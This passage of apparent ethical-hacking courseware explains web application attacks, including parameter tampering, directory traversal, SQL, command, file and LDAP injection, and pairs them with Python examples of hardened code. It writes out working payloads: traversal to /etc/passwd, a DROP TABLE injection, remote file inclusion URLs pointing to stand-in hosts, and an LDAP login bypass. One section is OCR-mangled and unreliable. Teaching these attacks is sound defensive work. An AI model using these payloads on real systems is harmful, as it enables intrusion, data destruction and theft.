Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters. Changed parameters in the form field are the best example of parameter tampering. When a user selects an HTML page, it is stored as a form field value and transferred as an HTTP page to the web application. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.

Hidden fields that are invisible to the end user provide information status to the web application. For example, consider a product order form that includes the hidden field as follows:

<input type="hidden" name="price" value="">

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the combo box as follows:

<FORM METHOD=POST ACTION="xfermoney.asp">
Source Account: <SELECT NAME="SrcAcc">
<OPTION VALUE="">******789</OPTION>
<OPTION VALUE="">******868</OPTION></SELECT>
<BR>Amount: <INPUT NAME="Amount" SIZE=20>
<BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
<BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>

Bypassing

An attacker may bypass the need to choose between two accounts by adding another account into the HTML page source code. The new combo box is displayed in the web browser and the attacker can choose the new account. HTML forms submit their results using one of two methods: GET or POST. In the GET method, all form parameters and their values appear in the query string of the next URL, which the user sees. An attacker may tamper with this query string. For example, consider a web page that allows an authenticated user to select one of his or her accounts from a combo box and debit the account with a fixed unit amount. When the submit button is pressed in the web browser, the URL is requested as follows:

http://www.juggybank.com/cust.asp?profile=21&debit=2500

An attacker may change the URL parameters (profile and debit) in order to debit another account:

http://www.juggybank.com/cust.asp?profile=82&debit=150

There are other URL parameters that an attacker can modify, including attribute parameters and internal modules. Attribute parameters are unique parameters that characterize the behavior of the uploading page. For example, consider a content-sharing web application that enables the content creator to modify content, while other users can only view the content. The web server checks whether the user who is accessing an entry is the author or not (usually by cookie). An ordinary user will request the following link:

http://www.juggybank.com/stat.asp?pg=531&status=view

An attacker can modify the status parameter to delete in order to delete permission for the content:

http://www.juggybank.com/stat.asp?pg=147&status=delete

Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.

Figure 13.6: Form Tampering. Tampering with the URL parameters: http://www.juggybank.com/cust.asp?profile=21&debit=2500 is changed to http://www.juggybank.com/cust.asp?profile=82&debit=150. Other parameters can be changed, including attribute parameters: http://www.juggybank.com/stat.asp?pg=531&status=view is changed to http://www.juggybank.com/stat.asp?pg=147&status=delete.
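The defence against the tampering described above is to treat every client-supplied parameter (URL query, hidden field, combo box value) as untrusted and to let server-side state decide what the request may do: the authenticated session, not the profile parameter, determines which account can be debited, and the catalogue, not the hidden price field, determines what an order costs. The following Python block is an added example written for this section, not code from the EC-Council module; the account owners, balances, catalogue and the user "alice" are constructed sample data (profile 21/82, the debit amounts and the user "jason" come from the module's own URLs).

```python
# Constructed sample data standing in for the bank's database (not from the page).
ACCOUNT_OWNERS = {21: "jason", 82: "alice"}   # profile id -> account owner
BALANCES = {21: 5000, 82: 3000}               # profile id -> balance
CATALOGUE = {"SKU-100": 49}                    # product id -> server-side unit price


def handle_debit(session_user: str, params: dict) -> tuple:
    """Server side of cust.asp?profile=..&debit=..  Returns (http_status, message).

    session_user comes from the server-side session, never from the request.
    The URL parameters are only a request; ownership is checked against the
    session, so rewriting profile=21 to profile=82 is refused with 403."""
    try:
        profile = int(params["profile"])
        amount = int(params["debit"])
    except (KeyError, ValueError):
        return (400, "profile and debit must be integers")
    if amount <= 0:
        return (400, "debit must be positive")
    if ACCOUNT_OWNERS.get(profile) != session_user:
        return (403, "profile does not belong to the authenticated user")
    if BALANCES[profile] < amount:
        return (400, "insufficient funds")
    BALANCES[profile] -= amount
    return (200, f"new balance {BALANCES[profile]}")


def handle_order(params: dict) -> tuple:
    """Server side of a product order form that carried a hidden 'price' field.

    Any client-supplied 'price' is ignored; the total is recomputed from the
    server-side catalogue, so editing the hidden field changes nothing."""
    try:
        sku = params["sku"]
        qty = int(params["qty"])
    except (KeyError, ValueError):
        return (400, "sku and an integer qty are required")
    if qty <= 0 or sku not in CATALOGUE:
        return (400, "unknown product or bad quantity")
    return (200, CATALOGUE[sku] * qty)


if __name__ == "__main__":
    print(handle_debit("jason", {"profile": "21", "debit": "2500"}))
    print(handle_debit("jason", {"profile": "82", "debit": "150"}))   # tampered profile
    print(handle_order({"sku": "SKU-100", "qty": "2", "price": "1"}))  # tampered price
```

The 403 responses are worth logging with the session user and the requested profile: a user who repeatedly requests profiles that are not theirs is the tampering pattern the figure above illustrates.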

Directory Traversal

When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A directory traversal/forceful browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:
- Enumerate the contents of files and directories
- Access pages that otherwise require authentication (and possibly payment)
- Gain secret knowledge of the application and its construction
- Discover user IDs and passwords buried in hidden files
- Locate source code and other interesting files left on the server
- View sensitive data, such as customer information

The following example uses directory traversal to back up several directories and obtain a file containing a backup of the web application:

http://www.targetsite.com/../../../sitebackup.zip

This example obtains the "/etc/passwd" file from a UNIX/Linux system, which contains user account information:

http://www.targetsite.com/../../../../etc/passwd

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

http://www.juggyboy.com/process.aspx=../somedir/somefile
http://www.juggyboy.com/.././../../somedir/somefile

The pictorial representation of a directory traversal attack is shown as follows:

Figure: Directory Traversal. The attacker sends a request containing "/../../../etc/passwd" to vulnerable server code (a PHP script that builds a file path from a request parameter), and the server returns the password file, whose entries include root, daemon, and Jason.
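The server-side fix for the requests above is canonicalization: decode the client-supplied path (including the Unicode/UTF-8/URL-encoded forms described under "Obfuscation Application" earlier), resolve it to an absolute path, and refuse anything that does not stay inside the directory the application is allowed to serve. The following Python block is an added example written for this section, not code from the EC-Council module; the web root /var/www/site/public is an assumed location and need not exist for the check to work.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumption: the only directory the application may serve files from.
WEB_ROOT = "/var/www/site/public"


def canonicalize(requested: str) -> str:
    """Undo the encodings used to hide '../': repeated percent-decoding (catches
    %2e%2e%2f and double-encoded %252e%252e) and backslash-to-slash normalisation."""
    decoded = requested
    for _ in range(3):                  # bounded: stop as soon as decoding is stable
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")


def resolve_requested_path(requested: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Map a client-supplied path to an absolute path inside web_root.

    Returns None when the normalised path escapes web_root or contains a NUL
    byte, which is exactly the traversal case the examples above describe."""
    path = canonicalize(requested)
    if "\0" in path:
        return None
    root = os.path.realpath(web_root)
    # lstrip('/') so an absolute-looking request is still interpreted relative to root;
    # realpath collapses every '.' and '..' segment before the containment test.
    candidate = os.path.realpath(os.path.join(root, path.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for req in ["somedir/somefile", "../../../../etc/passwd",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd", "..%252f..%252fetc/passwd",
                ".././../../somedir/somefile"]:
        print(f"{req!r:40} -> {resolve_requested_path(req)}")
```

Because the containment test runs on the resolved path, symbolic links inside the web root that point outside it are also refused; if such links are intended, they have to be allowed explicitly rather than by weakening the check.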

41 Ethical Hacking and Countermeasures Hacking Web Applications S e c u r i t y M i s c o n f i g u r a t i o n C E H Easy Exploitation Using m isconfiguration vulnerabilities, attackers gain unauthorized accesses to default accounts, read unused pages, exploit unpatched flaws, and read o r w rite unprotected files and directories, etc. Common Prevalence Security misconfiguration can occur at any level o f an application stack, including the platform, web server, application server, fram ew ork, and custom code Example e The application server admin console is automatically installed and not removed Default accounts are not changed Attacker discovers the standard admin pages on server, logs in with default passwords, and takes over C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. M S e c u r i t y M i s c o n f i g u r a t i o n ' " Developers and n e tw o rk a d m in is tra to rs should check th a t th e e n tire stack is configured p ro p e rly or security m isconfig u ra tio n can happen at any level o f an a pplicatio n stack, including th e p la tfo rm, w eb server, applica tio n server, fra m e w o rk, and custom code. For instance, if th e server is n o t configured p roperly, th e n it results in various problem s th a t can in fe ct th e security o f a w ebsite. The problem s th a t lead to such instances include server s o ftw a re flaw s, unpatched security flaw s, enabling unnecessary services, and im p ro p e r a u th e n tic a tio n. A fe w o f these problem s can be d e te cte d easily w ith th e help o f a u to m a te d scanners. A ttackers can access d e fa u lt accounts, unused pages, unpatched flaw s, u n p ro te cte d files and d irectories, etc. to gain u n a u th o riz e d access. All th e unnecessary and unsafe fe a tures have to be taken care o f and it proves very beneficial if th e y are com p le te ly disabled so th a t the outsiders d o n 't m ake use o f th e m fo r m alicious attacks. 
All application files have to be protected through proper authentication and strong security controls, or crucial information can leak to attackers. Examples of unnecessary features that should be disabled or changed include:

- The application server admin console is automatically installed and not removed
- Default accounts are not changed

- An attacker who discovers the standard admin pages on the server logs in with the default passwords and takes over

Injection Flaws

- Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.
- Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access.
- Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc., and can be easily discovered by application vulnerability scanners and fuzzers.

SQL injection: the injection of malicious SQL queries into user input forms.
Command injection: the injection of malicious code through a web application.
LDAP injection: the injection of malicious LDAP statements.

Injection flaws are loopholes in the web application that allow unreliable data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can read, write, delete, and update any data the backend can reach, whether or not it belongs to that particular application. There are many types of injection flaws; some of them are as follows:

SQL injection

SQL injection is the most common website vulnerability on the Internet.
It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. The attacker injects malicious SQL queries into the user input form, usually either to gain unauthorized access to a database or to retrieve information directly from the database.

Command injection

Command injection flaws are another type of web application vulnerability.

These flaws are highly dangerous. In this type of attack, the attacker injects malicious code via a web application.

LDAP injection

LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited to launch attacks. When an application fails to sanitize user input, the LDAP statement can be modified with the help of a local proxy. This in turn results in the execution of arbitrary LDAP queries, for example granting access through unauthorized queries or altering the contents of the LDAP tree.

SQL Injection Attacks

- SQL injection attacks use a series of malicious SQL queries to directly manipulate the database.
- An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data.
- SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches.

SQL injection vulnerable server code:

    <?php
    function save_email($user, $message)
    {
        $sql = "INSERT INTO Messages (
            user, message
        ) VALUES (
            '$user', '$message'
        )";
        return mysql_query($sql);
    }
    ?>

Attacker input for the message field which, when this code sends it to the database server, drops the Messages table (this relies on the database API accepting a second, stacked statement):

    test'); DROP TABLE Messages; --

Attacker input that inserts spammy data on behalf of other users, which needs no stacked statement because it only extends the VALUES list of the original INSERT:

    test'), ('user2', 'I am Jason'), ('user3', 'You are hacked

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection.

SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.
The reason SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,

    SELECT * FROM tablename WHERE UserID = 2302

becomes the following with a simple SQL injection attack:

    SELECT * FROM tablename WHERE UserID = 2302 OR 1=1

The expression "OR 1=1" always evaluates to TRUE, so the WHERE clause matches every row, often allowing the enumeration of all user ID values in the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:

- Log in to the application without supplying valid credentials

- Perform queries against data in the database, often even data to which the application would not normally have access
- Modify the database contents, or drop the database altogether
- Use the trust relationships established between the web application components to access other databases

FIGURE: SQL Injection Attacks (the vulnerable save_email() code and the two attacker inputs shown on the slide above: the DROP TABLE payload that removes the Messages table when the code is sent to the database server, and the payload that inserts spammy data on behalf of other users)
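The three attacks described above (the stacked DROP TABLE, the extra VALUES tuples, and the "OR 1=1" enumeration), as an added example that is not part of the original module. It is Python against an in-memory SQLite database rather than the page's PHP/MySQL; the Messages table, the users table and its three rows are constructed here. The vulnerable insert uses executescript(), which accepts stacked statements, to reproduce the behaviour the page describes; whether a real backend runs the second statement depends on the driver. Each vulnerable function is paired with a parameterised version.

```python
import sqlite3

# Constructed sample schema: the Messages table from the page's PHP example
# plus a small users table for the "OR 1=1" enumeration example.
SCHEMA = """
CREATE TABLE Messages (user TEXT, message TEXT);
CREATE TABLE users (UserID INTEGER, name TEXT);
INSERT INTO users VALUES (2302, 'jason'), (2303, 'shaun'), (2304, 'addison');
"""


def fresh_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def save_email_vulnerable(conn, user, message):
    """Mirror of the page's save_email(): user input is pasted into the SQL text.
    executescript() runs stacked statements, so a second statement supplied by
    the attacker (DROP TABLE) is executed too (assumption: the backend allows it)."""
    sql = f"INSERT INTO Messages (user, message) VALUES ('{user}', '{message}')"
    conn.executescript(sql)


def save_email_safe(conn, user, message):
    """Hardened version: a parameterised query. The driver passes the values
    separately from the SQL text, so quotes and parentheses stay data."""
    conn.execute("INSERT INTO Messages (user, message) VALUES (?, ?)", (user, message))


def messages(conn):
    return conn.execute("SELECT user, message FROM Messages ORDER BY rowid").fetchall()


def table_exists(conn, name):
    q = "SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?"
    return conn.execute(q, (name,)).fetchone()[0] == 1


def demo_spam_rows():
    """Page payload 1: close the attacker's value and append more VALUES tuples,
    inserting rows on behalf of other users. Returns (vulnerable rows, safe rows)."""
    payload = "test'), ('user2', 'I am Jason'), ('user3', 'You are hacked"
    vuln, safe = fresh_db(), fresh_db()
    save_email_vulnerable(vuln, "user1", payload)
    save_email_safe(safe, "user1", payload)
    return messages(vuln), messages(safe)


def demo_drop_table():
    """Page payload 2: terminate the INSERT, run DROP TABLE, comment out the rest.
    Returns whether Messages still exists for (vulnerable, safe)."""
    payload = "test'); DROP TABLE Messages; --"
    vuln, safe = fresh_db(), fresh_db()
    save_email_vulnerable(vuln, "user1", payload)
    save_email_safe(safe, "user1", payload)
    return table_exists(vuln, "Messages"), table_exists(safe, "Messages")


def find_user_vulnerable(conn, user_id):
    """Page example: SELECT ... WHERE UserID=<input> with the input pasted in."""
    return conn.execute(f"SELECT name FROM users WHERE UserID={user_id}").fetchall()


def find_user_safe(conn, user_id):
    """Hardened: validate the type, then bind it as a parameter."""
    return conn.execute("SELECT name FROM users WHERE UserID=?", (int(user_id),)).fetchall()


def demo_or_1_equals_1():
    """'2302 OR 1=1' makes the WHERE clause always true and enumerates every user;
    the safe version raises ValueError because the input is not an integer."""
    conn = fresh_db()
    leaked = sorted(row[0] for row in find_user_vulnerable(conn, "2302 OR 1=1"))
    try:
        find_user_safe(conn, "2302 OR 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected


if __name__ == "__main__":
    print(demo_spam_rows())
    print(demo_drop_table())
    print(demo_or_1_equals_1())
```

The parameterised versions do not filter anything out: the payloads are stored verbatim as message text, which is the correct outcome. Type validation (int()) is what stops the "OR 1=1" case before it reaches the database.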

Command Injection Attacks

Shell injection
- An attacker tries to craft an input string to gain shell access to a web server.
- Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.

HTML embedding
- This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application.
- In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.

File injection
- The attacker exploits this vulnerability to make the application include a file of the attacker's choosing, here a remotely hosted script:
  http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?

Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system via system calls, use of external programs via shell commands, and calls to backend databases via SQL. Scripts written in Perl, Python, and other languages execute whatever is inserted into them by poorly designed web applications. If a web application uses any type of interpreter, attacks can be inserted to inflict damage. To perform their functions, web applications must use operating system features and external programs.
Although many programs are invoked externally, the most frequently used one is Sendmail. When a piece of information passed in an HTTP request is handed to an external system, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into it. The web application then blindly passes these characters to the external system for execution. SQL injection is a dangerous and rather widespread form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.

Shell injection

To complete various functions, web applications use other applications and programs, for example sending an email with the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous

especially to web page security. These injections allow intruders to perform various types of malicious attacks against the user's server. An attacker tries to craft an input string to gain shell access to a web server. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.

HTML embedding

This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.

File injection

The attacker exploits this vulnerability to make the application include a file of the attacker's choosing, here a remotely hosted script:

    http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?

Users are allowed to upload various files to the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If an uploaded file's name ends with a .php extension and any user requests it, the application interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands.

Command Injection Example

Attacker launching a code injection attack against a banner-exchange form at
http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036

Malicious code entered in the Banner URL field (the record the script stores is pipe-delimited, so the attacker supplies the remaining fields of the record):

    www.juggyboy.com/banner.gif|newpassword|1036|60|468

Form fields as submitted: User Name: Addison; Address: addi@juggyboy.com; Site URL: www.juggyboy.com; Banner URL: the value above; Password: newpassword.

1. The attacker enters the malicious code (with the account number) together with a new password. The last two sets of numbers are the banner size.
2. Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword".
3. The server script assumes that only the URL of the banner image file is inserted into that field.

Poor input validation in the server script was exploited in this attack, which abuses the database INSERT and UPDATE record commands.

The following is an example of command injection. To perform a command injection attack, the attacker first enters the malicious code (account number) with a new password. The last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for account 1036 is changed to "newpassword". The server script assumes that only the URL of the banner image file is inserted into that field.

FIGURE: Command Injection Example (the lspro.cgi banner form with the fields listed above; the Banner URL field carries www.juggyboy.com/banner.gif|newpassword|1036|60|468; poor input validation in the server script was exploited in this attack, which uses the database INSERT and UPDATE record commands)
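An added example, not part of the original module, of the shell injection case described above: a web handler that hands a user-supplied address to an external program, as the page says applications do with sendmail. It is Python; "echo" stands in for the mail program so that the example runs offline and sends nothing, and it assumes a POSIX /bin/sh. The vulnerable version builds a command line for the shell, the quoted version shows shlex.quote() as the partial fix when a shell cannot be avoided, and the safe version validates the value and passes an argv list with no shell at all.

```python
import re
import shlex
import subprocess

# 'echo' stands in for the external mail program the page talks about (sendmail),
# so the example runs offline and nothing is sent. Assumption: a POSIX /bin/sh.
MAILER = "echo"

# Assumed allow-list for what an address may look like (good enough for the demo).
_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def notify_vulnerable(address):
    """Shell injection: the address is pasted into a command line that /bin/sh
    parses, so ';', '|', '`', '$(...)' and friends in the input start new commands."""
    cmd = f"{MAILER} Sending to {address}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def notify_quoted(address):
    """Partial fix when a shell is unavoidable: shlex.quote() wraps the value so
    the shell treats it as one literal word, metacharacters included."""
    cmd = f"{MAILER} Sending to {shlex.quote(address)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def notify_safe(address):
    """Preferred fix: validate the value against what an address can look like,
    then pass an argv list with no shell, so there is no parsing step left
    for metacharacters to abuse."""
    if not _ADDRESS.match(address):
        raise ValueError(f"rejected address: {address!r}")
    proc = subprocess.run([MAILER, "Sending to", address], capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Constructed attacker input: a valid-looking address followed by a second command.
    payload = "jason@juggyboy.com; echo INJECTED"
    print(repr(notify_vulnerable(payload)))  # second line 'INJECTED' proves the injection
    print(repr(notify_quoted(payload)))      # the whole payload is one argument
    try:
        notify_safe(payload)
    except ValueError as err:
        print(err)
```

The argv-list form is the one to prefer: quoting protects against the shell, but the external program itself may still interpret leading dashes or other characters in its arguments, which is why the allow-list check stays in place.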

File Injection Attack

File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. In the slide's example the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit, using the request

    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?

Users are allowed to upload various files to the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If an uploaded file's name ends with a .php extension and any user requests it, the application interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system.
Consider the following client code running in a browser (the select is named DRINK so that it matches the $_GET['DRINK'] key the script reads; PHP array keys are case-sensitive):

    <form method="get">
      <select name="DRINK">
        <option value="pepsi">pepsi</option>
        <option value="coke">coke</option>
      </select>
      <input type="submit">
    </form>

Vulnerable PHP code:

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>

To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com containing an exploit.

Exploit code:

    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?

The trailing "?" is deliberate: the script appends ".php" to whatever it receives, and the question mark turns that suffix into a query string for the attacker's server, so the exploit file is fetched unchanged. Including a URL this way requires allow_url_include to be enabled in the target's PHP configuration; with it disabled the same code still allows local file inclusion and directory traversal through values such as ../../../../etc/passwd.
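An added example, not part of the original module, covering both the directory traversal section earlier in the module and the file inclusion code above. It is Python rather than PHP and does not open any files: the vulnerable resolver returns the path or URL that require($drink . '.php') would load, and the hardened resolver shows the three checks a practitioner would put in front of it. The document root /var/www/juggyboy/pages and the allow-list {"pepsi", "coke"} are assumptions for the example.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed values for the example (not from the page): the document root the
# vulnerable script lives in and the only pages it was ever meant to include.
WEB_ROOT = "/var/www/juggyboy/pages"
ALLOWED_PAGES = {"pepsi", "coke"}


def include_target_vulnerable(drink):
    """What the page's require($drink . '.php') ends up loading.

    The client-supplied value is used as-is: a URL is fetched from the remote
    host (PHP does this when allow_url_include is on), and anything else is
    joined under the document root, where '..' components walk out of it.
    Returns the path or URL the server would open rather than opening it."""
    target = drink + ".php"
    if urlsplit(target).scheme:
        return target
    return posixpath.normpath(posixpath.join(WEB_ROOT, target))


def include_target_safe(drink):
    """Hardened resolver with three independent checks:
      1. no URL scheme and no protocol-relative prefix (remote file inclusion),
      2. the normalised path must stay under WEB_ROOT (directory traversal),
      3. the name must be on the allow-list (the script only has two pages).
    A deployed version would also canonicalise with os.path.realpath() so that
    symlinks inside WEB_ROOT cannot point back outside it."""
    if urlsplit(drink).scheme or drink.startswith("//"):
        raise ValueError("remote inclusion rejected")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, drink + ".php"))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        raise ValueError("path escapes the document root")
    if drink not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    return candidate


def classify(drink):
    """Show side by side what the vulnerable script would load and whether
    the hardened resolver accepts the same input."""
    try:
        include_target_safe(drink)
        verdict = "accepted"
    except ValueError as err:
        verdict = f"rejected ({err})"
    return include_target_vulnerable(drink), verdict


if __name__ == "__main__":
    # Constructed inputs: the legitimate value, the module's traversal examples, the RFI URL.
    for value in ("coke", "../../../../etc/passwd", "../../../sitebackup.zip",
                  "/etc/passwd", "http://jasoneval.com/exploit?"):
        print(f"{value!r:36} -> {classify(value)}")
```

Note that posixpath.join() discards the document root when the second argument is absolute, so "/etc/passwd" escapes just as "../../../../etc/passwd" does; the commonpath check catches both, and the allow-list catches inputs such as "pepsi/../coke" that normalise to a legitimate file the user was not supposed to pick by that route.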

What Is LDAP Injection?

An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services, in order to obtain direct access to the databases behind an LDAP tree.

- LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries.
- LDAP is based on the client-server model, and clients can search the directory entries using filters.

Filter syntax: (attributeName operator value)

    Operator      Example
    =             (objectclass=user)
    >=            (mdbStorageQuota>=100000)
    <=            (mdbStorageQuota<=100000)
    ~=            (displayName~=Foeckeler)
    * (wildcard)  (displayName=*John*)
    AND (&)       (&(objectclass=user)(displayName=John))
    OR (|)        (|(objectclass=user)(displayName=John))
    NOT (!)       (!(objectclass=group))

An LDAP (Lightweight Directory Access Protocol) injection attack works in the same way as a SQL injection attack. All inputs to LDAP must be properly filtered; otherwise vulnerabilities in the way the LDAP statement is built allow unauthorized queries to be executed or the directory contents to be modified. LDAP attacks exploit web-based applications that construct LDAP statements from user input, typically by modifying the request with a local proxy. LDAP statements are modified whenever the application fails to sanitize the input. Directory services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries.
LDAP is based on the client-server model, and clients can search the directory entries using filters.

FIGURE: LDAP Injection (the filter syntax (attributeName operator value) and the operator table shown above: =, >=, <=, ~=, the * wildcard, AND (&), OR (|) and NOT (!))

How LDAP Injection Works

Normal operation: the client sends a normal query to the LDAP server and receives the normal result.
Operation with code injection: the client sends a normal query plus injected code; the LDAP server returns the normal result and/or additional information.

LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query. To test whether an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques.

Account login example: the attacker enters the valid user name "juggyboy" followed by the injected text ")(&))", so the username field contains juggyboy)(&)), and any password, e.g. "blah". The filter string then becomes

    (&(USER=juggyboy)(&))(PASS=blah))

Only the first filter is processed by the LDAP server, i.e. only (&(USER=juggyboy)(&)). The inner (&) with no operands is the LDAP absolute-true filter, so this query is always true, and the attacker logs into the system without a valid password.

LDAP injection attacks are commonly used against web applications. They apply to any application that has some kind of user input used to generate LDAP queries. Depending upon the implementation of the target, one can try to achieve:

- Login bypass
- Information disclosure
- Privilege escalation
- Information alteration

Normal operation: Client sends Normal Query to LDAP Server; LDAP Server returns Normal Result to Client.
FIGURE: Normal operation

Operation with code injection: Client sends Normal Query + Code Injection to LDAP Server; LDAP Server returns Normal Result and/or Additional Information to Client.
FIGURE: Operation with code injection

Attack: if an attacker enters a valid user name of "juggyboy" and injects juggyboy)(&)), the filter string becomes (&(USER=juggyboy)(&))(PASS=blah)). Only the first filter is processed by the LDAP server, i.e. only (&(USER=juggyboy)(&)). This query is always true, and the attacker logs into the system without a valid password.

Account Login form as submitted by the attacker: Username: juggyboy)(&))  Password: blah
FIGURE: Attack

Hidden Field Manipulation Attack

HTML code:

    <form method="post" action="page.aspx">
    <input type="hidden" name="PRICE" value="200.00">
    Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
    Product price: 200.00<br>
    <input type="submit" value="submit">
    </form>

Normal request:

    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=200.00

Attack request:

    http://www.juggyboy.com/page.aspx?product=Juggyboy%20Shirt&price=2.00

- When a user makes selections on an HTML page, the selection is typically stored as form field values and sent to the application as an HTTP request (GET or POST).
- HTML can also store field values as hidden fields, which are not rendered to the screen by the browser but are collected and submitted as parameters during form submission.
- Attackers can examine the HTML code of the page and change the hidden field values in order to change the requests posted to the server.

Hidden field manipulation attacks are mostly used against e-commerce websites today, and many online stores face this problem. In every client session, developers use hidden fields to store client information, including the price of the product (including discount rates).
At the time of developing such programs, developers assume that the applications they build are safe, but an attacker can manipulate the price of the product and complete a transaction at the price he or she has altered, rather than the actual price of the product. For example, on eBay a particular mobile phone is for sale for $1000 and the attacker, by altering the price, gets it for only $10. This is a huge loss for website owners. To protect their networks from attacks, website owners deploy the latest antivirus software, firewalls, intrusion detection systems, etc., but none of those controls can tell a legitimate form submission from one whose price field was edited, so the check has to be made by the application itself. If a website is attacked, it often also loses its credibility in the market.

When a user requests a web page and makes choices on the HTML page, the choices are saved as form field values and delivered to the application as an HTTP request (GET or POST). HTML pages can also save field values as hidden fields; these are not displayed in the browser, but they are collected and submitted as parameters at the time of form submission. Attackers can examine the HTML code of the page and change the hidden field values in order to change the requests posted to the server.

    <form method="post" action="page.aspx">
    <input type="hidden" name="PRICE" value="200.00">

    Product name: <input type="text" name="product" value="Juggyboy Shirt"><br>
    Product price: 200.00<br>
    <input type="submit" value="submit">
    </form>

1. Open the HTML page in an HTML editor.
2. Locate the hidden field (e.g., <input type="hidden" name="PRICE" value="200.00">).
3. Modify its content to a different value (e.g., <input type="hidden" name="PRICE" value="2.00">).
4. Save the HTML file locally and browse to it.
